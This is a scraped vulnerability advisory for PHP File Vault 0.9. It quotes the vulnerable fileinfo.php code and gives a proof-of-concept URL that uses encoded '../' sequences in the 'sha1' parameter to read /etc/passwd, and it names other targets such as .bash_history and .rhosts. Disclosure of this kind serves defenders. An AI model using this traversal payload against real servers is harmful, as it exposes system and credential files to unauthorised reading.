扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 |
PHP File Vault version 0.9 , remote directory traversal and read file vulnerabilty ================================================================================== Discovered by N_A, N_A[at]tutanota.com ====================================== Description =========== A very small PHP website application which stores anonymously uploaded files and retrieves them by SHA1 hash (a fingerprint of the file which is provided after uploading). Developed for anonysource.org , a kanux project. https://sourceforge.net/projects/php-file-vault Vulnerability ============= The vulnerability exists within the fileinfo.php file of the package: A A Aif (empty($_GET['sha1'])) die("sha1 is required to get file info"); A A A$sha1 = trim($_GET['sha1']); the 'sha1' variable is requested via the GET method. It is passed as a variable to the 'parseFileInfo' function. This function incorporates a call to the fopen() function within PHP: A A AA A Afunction parseFileInfo($fi) { A A AA A A$fh = fopen($fi,'r'); A A AA A A$fname = trim(fgets($fh)); A A AA A Afclose($fh); A A AA A Areturn array($fname); A A AA A} The parseFileInfo() function is called within the file fileinfo.php with the 'sha1' variable inside: A A AA A Aif (!is_readable(FI.$sha1)) die("cannot read file info!"); A A AA A Alist($fname) = parseFileInfo(FI.$sha1); A A AA A Areadfile('head.html'); A A AA A Aif ($fname) echo "<h1><a href=\"/$sha1\">$fname</a></h1>"; This is the vulnerability that allows parts of *any world readable* file to be read by a remote attacker. Attacks can include gathering sensitive information, .bash_history, .rhosts, /etc/passwd and so on. Proof Of Concept ================ PoC exploit = http://127.0.0.1/htdocs/fileinfo.php?sha1=..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd |
体验盒子
